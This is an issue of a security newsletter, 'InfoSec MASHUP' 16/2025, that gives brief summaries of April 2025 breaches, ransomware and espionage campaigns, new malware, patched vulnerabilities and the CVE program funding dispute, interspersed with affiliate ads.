🕵🏻‍♂️ [InfoSec MASHUP] 16/2025

🔓 BREACHES & SECURITY INCIDENTS

🇺🇸 A ransomware group claims to have stolen 2.5 terabytes of files from Oregon's Department of Environmental Quality (DEQ) after the agency denied a data breach. The hackers demand a ransom of 30 bitcoin, threatening to auction the stolen data if not paid. The DEQ continues to investigate but has not confirmed a data breach in recent updates.

🇳🇱 🇺🇸 Ahold Delhaize has confirmed that data was stolen during a cyberattack on its U.S. business systems in November 2024. The company is investigating the breach and will notify customers if their personal data was affected. Despite the incident, all stores and online services remain operational.

🇺🇸 Insurance firm Lemonade revealed that a technical glitch exposed the driver’s license numbers of about 190,000 individuals — The issue occurred between April 2023 and September 2024, when the information was transmitted without encryption. Lemonade is offering free credit monitoring to those affected and states that there is no evidence of misuse of the data.

🇺🇸 DaVita, a kidney dialysis services provider, experienced a ransomware attack that disrupted some of its operations. The company activated response measures and is working with cybersecurity experts to address the situation. It has not disclosed details about the attackers or any potential data theft.

🇺🇸 Conduent reported a cyberattack in January that resulted in the theft of personal information, including names and Social Security numbers, from some clients. The company restored its systems quickly and confirmed that the stolen data has not been publicly released. Conduent is working with affected clients to address the situation and ensure compliance with legal notifications.

🇺🇸 Over 2.6 million people were affected by data breaches at Landmark Admin and Young Consulting — Landmark Admin reported a ransomware attack that compromised sensitive personal information of about 1.6 million individuals. Young Consulting also increased its estimate of affected individuals to over 1 million after a breach in April 2024.

🍀 (Infamous Internet imageboard and wretched hive of scum and villainy) 4chan has been down since Monday night [Apr. 14, 2025] due to a hack that compromised its databases and user information. A rival site, Soyjack Party, claims to have carried out the attack, but the truth is unclear. Security experts noted that 4chan's outdated software likely made it vulnerable to this breach.

🚗 Hertz has informed customers about a data breach that involved personal information and driver’s licenses due to a cyberattack on a vendor, Cleo Software. The stolen data affects customers in multiple countries, including names, contact details, and in some cases, Social Security numbers. Hertz stated that while the breach was significant, it would be inaccurate to say millions of customers were impacted.

🔗 Partners and Affiliates

🔐 NordVPN Spring Campaign 🌷 (March 19 — May 19)

With its user-friendly interface, robust security features, and commitment to privacy, NordVPN continues to be a popular choice for individuals seeking online protection and unrestricted internet access.

Special Offer: up to 77% off + 3 extra months on selected 2-year plans.

🥷🏻 CYBERCRIME, CYBER ESPIONAGE, APT’s

🇨🇳 🇺🇸 The Chinese hacking group Mustang Panda has updated its tools and backdoor in recent attacks, targeting government and military entities. They have infected over 4,000 computers in the U.S., using tools like the ToneShell backdoor and new keyloggers. Their methods include evading detection through DLL sideloading and employing a new traffic proxy tool called StarProxy.

🇨🇳 🇺🇸 China is pursuing three alleged U.S. operatives for cyberattacks on its infrastructure during the Asian Games in February. The attacks targeted systems related to the Games and caused harm to critical infrastructure and personal data security. China has urged the U.S. to stop these cyberattacks.

👤 Swiss cybersecurity firm Prodaft is buying verified accounts on hacking forums to monitor cybercriminals. They aim to gather intelligence on illegal activities and improve their threat detection methods. The company offers payments in cryptocurrency and ensures the process remains anonymous while reporting purchases to law enforcement.

🗓️ {Cyber,Info}Sec Events: My list of past and future {cyber,info}sec related events — Feel free to contribute by submitting issues or pull requests. Thanks! 😉

👨🏻‍⚖️ 👀 GOVERNMENT, POLITICS, AND PRIVACY

👋🏻 Chris Krebs has resigned from his role at SentinelOne after his security clearance was revoked following a presidential order. He stated that the decision to leave was his own and that he intends to focus on fighting for democracy and free speech outside of the company. The White House is reviewing his past actions at CISA to determine if there were any violations of conduct standards.

🇨🇳 🇺🇸 A Maryland man, Minh Phuong Ngoc Vong, admitted in court to fraudulently securing remote IT jobs with US companies for individuals in China. He provided false credentials and allowed foreign nationals to access sensitive US government systems while he received payment for their work. Vong pleaded guilty to wire fraud conspiracy and could face up to 20 years in prison.

🇪🇺 🇺🇸 The European Commission is providing staff with burner phones and laptops for trips to the US to prevent espionage. This measure, usually reserved for visits to countries like China and Russia, reflects the growing concerns about cyber threats from the US. Relations between the EU and the US have deteriorated, prompting heightened caution among European officials.

🇺🇸 A whistleblower revealed that DOGE may have accessed sensitive labor data from the National Labor Relations Board (NLRB), raising concerns about potential misuse. DOGE staff reportedly attempted to conceal their activities and were alarmed by suspicious logins from Russia. Experts worry that leaked data could harm unions and ongoing legal cases, and there are calls for further investigations into DOGE's practices.

🔗 Partners and Affiliates

🌐 Stay connected and secure on the go with Airalo's global eSIMs — Use the code NEWTOAIRALO15 if you’re new to Airalo to get an additional 15% discount.

🦠 MALWARE & THREATS

🇨🇳 Chinese hackers known as UNC5174 are targeting Linux systems using a new malware called SNOWLIGHT and an open-source tool named VShell. These tools allow attackers to gain remote access and control over infected systems, making it hard to trace their activities. The campaign has been linked to various cyber attacks across multiple countries and sectors.

💥 Over 16,000 Fortinet devices have been compromised with a symlink backdoor that allows hackers to access sensitive files. This issue stems from attackers using a known vulnerability to create a persistent link to the device's root filesystem. Fortinet is notifying affected customers and has released updates to help detect and remove the backdoor.

⬇️ Microsoft reports that since October 2024, threat actors have been using Node.js to deliver malware and steal information. They exploit malvertising campaigns, often disguising malicious installers as legitimate software, to trick users into downloading harmful files. Organizations are advised to educate users and implement security measures to mitigate these evolving threats.

🏦 IBM X-Force has reported that the cyber crime group Hive0148 is targeting users in Mexico and Costa Rica with phishing campaigns to spread the Grandoreiro banking trojan. This malware is designed to steal banking credentials and has been linked to significant financial fraud. Victims receive emails posing as government communications, tricking them into downloading malicious files.

💸 A new ransomware called "DOGE BIG BALLS" uses a deceptive ZIP file and PowerShell scripts to silently infect computers and encrypt files. It collects detailed system information and employs tactics to mislead victims, including using the name of a public figure. This sophisticated attack highlights advanced techniques for gaining access and evading detection.

🏥 💊 A new malware called ResolverRAT is targeting healthcare and pharmaceutical organizations, employing advanced techniques to evade detection. It spreads through phishing emails that use fear-based lures to trick employees into downloading malicious files. ResolverRAT is sophisticated, with features that allow it to maintain persistence and communicate stealthily with its command-and-control servers.

🤖 🧰 AI, CRYPTO, TECH & TOOLS

🇪🇺 Meta will start training its AI models using public data from users in the European Union after getting approval from regulators. This training aims to help the AI better understand European cultures, languages, and history. Users will receive notifications about this data use and can opt out if they choose.

🔗 Partners and Affiliates

⚡️ Unlock Your Peak Performance – First Month FREE!

Optimize your sleep, recovery, and performance with WHOOP. Perfect for cybersecurity pros who need to stay focused and ahead of the threat. Try it out, get a free WHOOP 4.0 and one month free.

🐛 🧠 VULNERABILITIES, RESEARCH, AND THREAT INTELLIGENCE

➝ From the Patching Department:

• Chrome 135, Firefox 137 Updates Patch Severe Vulnerabilities

• Oracle Patches 180 Vulnerabilities With April 2025 CPU

• Critical Erlang/OTP SSH pre-auth RCE is 'Surprisingly Easy' to exploit, patch now

🇺🇸 ⁉️ The U.S. government is ending funding for the Common Vulnerabilities and Exposures (CVE) program, which helps identify and track security flaws. This sudden halt could lead to confusion in cybersecurity and risks to national security, as no new vulnerabilities may be assigned without the program's support. Experts warn that without intervention from the security industry, managing vulnerabilities could become chaotic.

• Adam Shostack’s take on the above

• Brian Krebs’ take on the above

• NoVa govcon firm Mitre to lay off 442 employees after DOGE cuts contracts

🆕 April 16, 2025: The CVE Foundation:

The CVE Foundation has been formally established to ensure the long-term viability, stability, and independence of the Common Vulnerabilities and Exposures (CVE) Program, a critical pillar of the global cybersecurity infrastructure for 25 years.

🆕 April 16, 2025: GCVE: Global CVE Allocation System

The Global CVE (GCVE) allocation system is a new, decentralized approach to vulnerability identification and numbering, designed to improve flexibility, scalability, and autonomy for participating entities.

While remaining compatible with the traditional CVE system, GCVE introduces GCVE Numbering Authorities (GNAs). GNAs are independent entities that can allocate identifiers without relying on a centralised block distribution system or rigid policy enforcement.

• CISA reverses course, extends MITRE CVE contract

💥 A security flaw in Microsoft Windows, known as CVE-2025-24054, is actively being exploited to steal NTLM credentials during file downloads. This vulnerability allows attackers to leak user passwords with minimal interaction, posing a serious threat to organizations. CISA has urged agencies to apply necessary patches by May 8, 2025, to protect their networks.

🍎 🩹 Apple has released updates to fix two serious security vulnerabilities in iOS that may have been used to target specific individuals. These vulnerabilities, discovered by security researchers, could allow hackers to execute malicious code on Apple devices. The updates affect multiple products, including iPhones, iPads, macOS, Apple TV, and Vision Pro.

🐛 A serious vulnerability in Apache Roller (CVE-2025-24859), a Java-based blogging server, allows unauthorized access even after password changes. This flaw affects all versions up to 6.1.4 and has a maximum severity score of 10.0. It has been fixed in version 6.1.5, which ensures all active sessions are invalidated when passwords are changed.

🐛 Ivanti has faced more exploited vulnerabilities in its network devices than any other vendor in the past 16 months, raising concerns about its security practices. While some experts criticize Ivanti for this issue, others commend its transparency and proactive approach to vulnerability management. The challenges Ivanti faces may reflect broader issues in the industry rather than being solely a problem with the company itself. [more at CyberScoop]

💥 A threat actor is allegedly selling a zero-day exploit that targets FortiGate firewalls, allowing remote code execution without authentication. Fortinet recently released patches for known vulnerabilities, but attackers have maintained access to vulnerable devices. Users are urged to update their firewalls to secure versions to prevent exploitation.

🩹 Trend Micro has warned that Nvidia's patch for a critical vulnerability in the Nvidia Container Toolkit is incomplete, leaving systems vulnerable to attacks. This flaw could allow hackers to access sensitive data or disrupt operations in environments using Nvidia's software. Organizations using the affected toolkit should take precautions to limit exposure and avoid unnecessary privileges.

🛰️ ICS, OT & IoT

🚶🏻 Audio-enabled crosswalk buttons in Silicon Valley were hacked to play voices imitating Mark Zuckerberg and Elon Musk. The messages included humorous and unsettling AI-generated speech, raising concerns about privacy and security. Local officials are investigating the incident, which may be linked to hacktivism.

💬 CONNECT

Follow me on Mastodon for quick daily updates and bite-sized content.

Prefer using an RSS feed? Add Infosec MASHUP to your feed here.

Thanks for reading today’s newsletter, and if you're enjoying it and want to support my work, you can buy me a coffee ☕ over at https://www.buymeacoffee.com/0x58

See you next time!

-X.